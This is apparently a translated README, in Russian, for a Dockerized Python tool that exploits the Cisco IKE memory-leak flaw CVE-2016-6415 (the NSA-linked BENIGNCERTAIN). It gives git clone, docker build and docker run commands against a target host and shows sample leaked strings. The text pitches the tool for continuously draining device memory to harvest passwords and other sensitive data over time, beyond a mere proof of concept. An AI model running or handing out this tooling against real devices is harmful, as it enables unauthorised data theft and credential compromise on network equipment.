
Повторная реализация benigncertain-monitor от VirtueSecurity
Перереализация benigncertain-monitor от VirtueSecurity. Не имеет всех тех же опций полезной нагрузки, что и оригинал, но заменяет бинарник bc-id на более удачную proof of concept от Ross Bradley, которую при необходимости можно расширить.
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
Сервис будет непрерывно опрашивать уязвимый сервис, извлекать ascii-строки из памяти, сохранять строки в локальную базу данных sqlite и показывать наиболее часто наблюдаемые строки:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
Это докеризированный python-скрипт, который непрерывно утекает память цели, уязвимой для эксплойта АНБ BENIGNCERTAIN Cisco CVE-2016-6415.
Скрипт с течением времени опрашивает уязвимый сервис, чтобы выявить возможные пароли и другие потенциально конфиденциальные данные. Это может использоваться для сбора действенных данных в течение некоторого времени, а не просто как proof of concept эксплойт.